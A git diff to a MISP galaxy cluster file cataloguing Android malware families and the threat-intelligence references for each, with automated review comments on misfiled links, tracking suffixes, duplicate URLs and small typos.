diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index 448a708..cf86cd8 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -24,6 +24,7 @@
 "https://github.com/fboldewin/FastCashMalwareDissected/",
 "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
 "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
 "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware",
 "https://www.us-cert.gov/ncas/alerts/TA18-275A",
 "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
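Review bot: The reference added to the FastCash refs, `https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/`, reads from its slug as a write-up of the Campo campaign rather than of FastCash, so it is not obvious why it belongs in this entry. Ref lists in this cluster are consumed as-is by downstream MISP users, so a misfiled link propagates to every instance that syncs the galaxy; I would confirm the article actually covers FastCash before merging, or move it to the entry it describes. The enclosing FastCash entry starts and ends outside this hunk.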
@@ -38,12 +39,39 @@
 "uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02",
 "value": "FastCash"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.888_rat",
+ "https://www.welivesecurity.com/2021/09/07/bladehawk-android-espionage-kurdish/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e98ae895-0831-4e10-aad1-593d1c678db1",
+ "value": "888 RAT"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.aberebot",
+ "https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4b9c0228-2bfd-4bc7-bd64-8357a2da12ee",
+ "value": "Aberebot"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/",
+ "https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/"
 ],
 "synonyms": [
 "AxeSpy"
@@ -101,6 +129,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien",
 "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
+ "https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets",
+ "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
 "https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/"
 ],
 "synonyms": [],
@@ -109,15 +139,42 @@
 "uuid": "de483b10-4247-46b3-8ab5-77d089f0145c",
 "value": "Alien"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anatsa",
+ "https://www.cleafy.com/documents/teabot",
+ "https://labs.k7computing.com/?p=22407",
+ "https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html",
+ "https://twitter.com/ThreatFabric/status/1394958795508523008",
+ "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
+ "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368",
+ "https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/",
+ "https://www.buguroo.com/hubfs/website/pdf/reports/buguroo-malware-report-Toddler_EN.pdf",
+ "https://twitter.com/_icebre4ker_/status/1416409813467156482"
+ ],
+ "synonyms": [
+ "TeaBot",
+ "Toddler"
+ ],
+ "type": []
+ },
+ "uuid": "147081b9-7e59-4613-ad55-bbc08141fee1",
+ "value": "Anatsa"
+ },
 {
 "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat",
 "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html",
+ "https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat",
 "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/",
+ "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat",
 "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset",
 "https://github.com/DesignativeDave/androrat",
+ "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg",
 "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/"
 ],
@@ -136,6 +193,7 @@
 "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
 "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
 "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
+ "https://0x1c3n.tech/anubis-android-malware-analysis",
 "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis",
 "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/",
@@ -150,6 +208,7 @@
 "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ",
 "https://community.riskiq.com/article/85b3db8c",
 "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/",
+ "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
 "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
 "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
 "https://pentest.blog/n-ways-to-unpack-mobile-malware/",
@@ -268,7 +327,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke",
- "https://twitter.com/LukasStefanko/status/1280243673100402690"
+ "https://twitter.com/LukasStefanko/status/1280243673100402690",
+ "https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE",
+ "https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/"
 ],
 "synonyms": [],
 "type": []
@@ -372,9 +433,12 @@
 "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf",
 "https://github.com/ics-iot-bootcamp/cerberus_research",
 "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://nur.pub/cerberus-analysis",
 "https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf",
+ "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html",
 "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
+ "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
 "https://twitter.com/AndroidCerberus"
 ],
 "synonyms": [],
@@ -418,13 +482,52 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor",
+ "https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests",
+ "https://thewire.in/tag/pegasus-project",
 "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/",
- "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
- "https://media.ccc.de/v/33c3-7901-pegasus_internals",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://twitter.com/HackSysTeam/status/1418223814387765258?s=20",
+ "https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/",
 "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus",
+ "https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/",
+ "https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus",
+ "https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/",
+ "https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/",
+ "https://forbiddenstories.org/about-the-pegasus-project/",
+ "https://www.theguardian.com/news/series/pegasus-project",
+ "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat",
+ "https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/",
+ "https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/",
+ "https://twitter.com/alexanderjaeger/status/1417447732030189569",
+ "https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto",
+ "https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/",
+ "https://twitter.com/billmarczak/status/1416801439402262529",
+ "https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/",
+ "https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure",
+ "https://citizenlab.ca/2021/07/amnesty-peer-review/",
+ "https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5",
+ "https://media.ccc.de/v/33c3-7901-pegasus_internals",
+ "https://thewire.in/media/pegasus-project-spyware-indian-journalists",
+ "https://zetter.substack.com/p/pegasus-spyware-how-it-works-and",
+ "https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/",
 "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/",
- "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf"
+ "https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
+ "https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/",
+ "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html",
+ "https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying",
+ "https://nex.sx/blog/2021/08/03/the-pegasus-project.html",
+ "https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso",
+ "https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages",
+ "https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/",
+ "https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/",
+ "https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html",
+ "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
+ "https://objective-see.com/blog/blog_0x67.html"
 ],
 "synonyms": [
 "JigglyPuff",
@@ -504,6 +607,19 @@
 "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a",
 "value": "Connic"
 },
+ {
+ "description": "The malicious Coper apps have a modular architecture and a multi-stage infection mechanism. All known Coper banker trojan modifications target Colombian users to date. However, new versions targeting users from other countries are likely to emerge over time.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.coper",
+ "https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "70973ef7-e031-468f-9420-d8aa4eb7543a",
+ "value": "Coper"
+ },
 {
 "description": "Poses as an app that can offer a \"corona safety mask\" but phone's address book and sends sms to contacts, spreading its own download link.",
 "meta": {
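Review bot: Several of the Chrysaor refs added here carry tracking or session suffixes that are not part of the resource identity: `?s=20` on the HackSysTeam tweet and `?itid=co_pegasus_5` on the Washington Post Khashoggi link. The same `?s=20` suffix is added in the FluBot hunk (two alberto__segura tweets) and the Unidentified APK 006 hunk (MsftSecIntel tweet), and the BasBanke hunk adds a `#.YHTDZS2tEUE` share fragment. Because refs are matched as plain strings, the canonical URL and the suffixed one are treated as two different references, so the same article can be added twice and de-duplication across entries silently fails; stripping them before commit keeps the list canonical, e.g. `"https://twitter.com/HackSysTeam/status/1418223814387765258",`.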
@@ -672,6 +788,35 @@
 "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b",
 "value": "Dvmap"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.elibomi",
+ "https://blog.cyble.com/2021/09/07/fake-income-tax-application-targets-indian-taxpayers/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-android-malware-targets-taxpayers-in-india/"
+ ],
+ "synonyms": [
+ "Drinik"
+ ],
+ "type": []
+ },
+ "uuid": "63cc0b01-c92e-40e7-8669-48d10a490ffb",
+ "value": "Elibomi"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ermac",
+ "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "602944f4-a86c-4a05-b98f-cfb525fb8896",
+ "value": "ERMAC"
+ },
 {
 "description": "According to ThreatFabric, the app overlays 15 financial targets from UK, Italy, and Spain, sniffs 234 apps from banks located in Europe as well as crypto wallets.",
 "meta": {
@@ -716,11 +861,26 @@
 "uuid": "462bc006-b7bd-4e10-afdb-52baf86121e8",
 "value": "Exodus"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakeadblocker",
+ "https://www.welivesecurity.com/2021/07/20/url-shortener-services-android-malware-banking-sms-trojans/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d0ae2b6b-5137-4b64-be3e-4bbc9aa007a6",
+ "value": "FakeAdBlocker"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy",
+ "https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html",
+ "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
 "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681"
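Review bot: The two trendmicro.com/en_us/research/18/... URLs added to the FakeSpy refs are the migrated copies of the two blog.trendmicro.com/trendlabs-security-intelligence/... entries kept directly below them (identical slugs), so the entry now cites each of those articles twice under two hostnames. Keeping one form per article avoids double references and makes later de-duplication tooling work; if the old domain is being phased out, drop the blog.trendmicro.com lines and keep the new ones. The MoqHao hunk introduces the same pairing for the xloader-and-fakespy article. The FakeSpy refs array continues past the end of this hunk.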
@@ -764,11 +924,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher",
- "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf",
 "https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/",
- "https://github.com/linuzifer/FinSpy-Dokumentation",
+ "https://securelist.com/finspy-unseen-findings/104322/",
 "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
- "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/"
+ "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
+ "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf",
+ "https://github.com/linuzifer/FinSpy-Dokumentation"
 ],
 "synonyms": [],
 "type": []
@@ -781,7 +942,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy",
- "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
+ "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/",
+ "https://mobisec.reyammer.io/slides"
 ],
 "synonyms": [],
 "type": []
@@ -806,19 +968,58 @@
 "value": "FlexNet"
 },
 {
- "description": "PRODAFT describes FluBot as a banking malware, targeting Spain and potentially German-, Polish-, and English-speaking users. It uses a DGA for it's C&C.",
+ "description": "PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for it's C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March of 2021, the campaign has only intensified since.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot",
+ "https://mobile.twitter.com/alberto__segura/status/1400396365759500289",
+ "https://twitter.com/alberto__segura/status/1399249798063087621?s=20",
+ "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon",
+ "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368",
+ "https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06",
+ "https://twitter.com/alberto__segura/status/1402615237296148483",
+ "https://twitter.com/malwrhunterteam/status/1359939300238983172",
+ "https://twitter.com/alberto__segura/status/1384840011892285440",
+ "https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027",
+ "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
+ "https://securityintelligence.com/posts/story-of-fakechat-malware/",
+ "https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html",
 "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9",
- "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf"
+ "https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/",
+ "https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users",
+ "https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html",
+ "https://blog.zimperium.com/flubot-vs-zimperium/",
+ "https://hispasec.com/resources/FedexBanker.pdf",
+ "https://twitter.com/alberto__segura/status/1395675479194095618",
+ "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf",
+ "https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/",
+ "https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/",
+ "https://therecord.media/flubot-malware-gang-arrested-in-barcelona/",
+ "https://twitter.com/alberto__segura/status/1404098461440659459",
+ "https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/"
+ ],
+ "synonyms": [
+ "Cabassous",
+ "FakeChat"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "ef91833f-3334-4955-9218-f106494e9fc0",
 "value": "FluBot"
 },
+ {
+ "description": "Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries using social media hijacking, 3rd party app stores and sideloading. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flytrap",
+ "https://blog.zimperium.com/flytrap-android-malware-compromises-thousands-of-facebook-accounts/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "24af5bcc-d4bd-42dd-aed4-f994b30b4921",
+ "value": "FlyTrap"
+ },
 {
 "description": "",
 "meta": {
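Review bot: The rewritten FluBot description carries the `it's C&C` typo over from the line it replaces; since the sentence was touched anyway it should read `It uses a DGA for its C&C and relies on both DNS and DNS-over-HTTPS for name resolution.`. The new FlyTrap description also ends with a space before the closing quote (`sideloading. "`), which will be carried into every export and tag built from this value; trimming it to `sideloading."` keeps the value clean.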
@@ -926,6 +1127,19 @@
 "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49",
 "value": "GlanceLove"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gnatspy",
+ "https://www.trendmicro.com/en_us/research/17/l/new-gnatspy-mobile-malware-family-discovered.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a3b6a355-3afe-49ae-9f87-679c6c382943",
+ "value": "GnatSpy"
+ },
 {
 "description": "",
 "meta": {
@@ -952,6 +1166,20 @@
 "uuid": "e111fff8-c73c-4069-b804-2d3732653481",
 "value": "GoldenRAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goontact",
+ "https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail",
+ "https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "008ef3f3-579e-4065-ad0a-cf96be00becf",
+ "value": "goontact"
+ },
 {
 "description": "Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. ",
 "meta": {
@@ -971,10 +1199,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff",
- "https://blog.talosintelligence.com/2019/10/gustuffv2.html",
 "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://blog.talosintelligence.com/2019/10/gustuffv2.html",
 "https://www.group-ib.com/media/gustuff/",
+ "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
 "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html"
 ],
 "synonyms": [],
@@ -1003,7 +1232,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw",
- "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/"
+ "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/",
+ "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw"
 ],
 "synonyms": [],
 "type": []
@@ -1116,11 +1346,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker",
- "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html",
+ "https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/",
 "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451",
 "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/",
 "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
- "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html"
+ "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html",
+ "https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/",
+ "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html",
+ "https://labs.k7computing.com/?p=22199"
 ],
 "synonyms": [],
 "type": []
@@ -1169,6 +1402,22 @@
 "uuid": "196d51bf-cf97-455d-b997-fc3e377f2188",
 "value": "KSREMOTE"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.little_looter",
+ "https://securityintelligence.com/posts/itg18-operational-security-errors-plague-iranian-threat-group/",
+ "https://twitter.com/malwrhunterteam/status/1337684036374945792",
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf",
+ "https://www.youtube.com/watch?v=nilzxS9rxEM"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "41cb4397-7ae0-4a9f-894f-47828e768aa9",
+ "value": "LittleLooter"
+ },
 {
 "description": "",
 "meta": {
@@ -1187,6 +1436,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot",
+ "https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view",
+ "https://isc.sans.edu/diary/27282",
+ "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
 "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
 "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html"
 ],
@@ -1258,7 +1510,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa",
- "https://twitter.com/ThreatFabric/status/1285144962695340032"
+ "https://twitter.com/ThreatFabric/status/1285144962695340032",
+ "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html"
 ],
 "synonyms": [
 "Gorgona"
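Review bot: The first ref added to the LokiBot entry is a Google Drive file link, which is neither a durable citation nor something a reviewer can check against the entry: the file can be made private or deleted at any time, and nothing in the URL identifies the document. A published or archived copy of whatever it points to would be preferable. The other two additions, the ISC diary and the Yoroi write-up on the Aggah campaign, read from their titles as coverage of the Windows LokiBot stealer rather than the Android family this `apk.lokibot` entry describes; that is inferred from the slugs only, but it is worth confirming they belong here rather than in a Windows LokiBot entry, if the galaxy carries one. The LokiBot entry starts and ends outside this hunk.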
@@ -1301,10 +1554,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao",
- "https://securelist.com/roaming-mantis-part-v/96250/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
+ "https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1",
 "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf",
- "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681"
+ "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
+ "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
+ "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html",
+ "https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html",
+ "https://securelist.com/roaming-mantis-part-v/96250/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf"
 ],
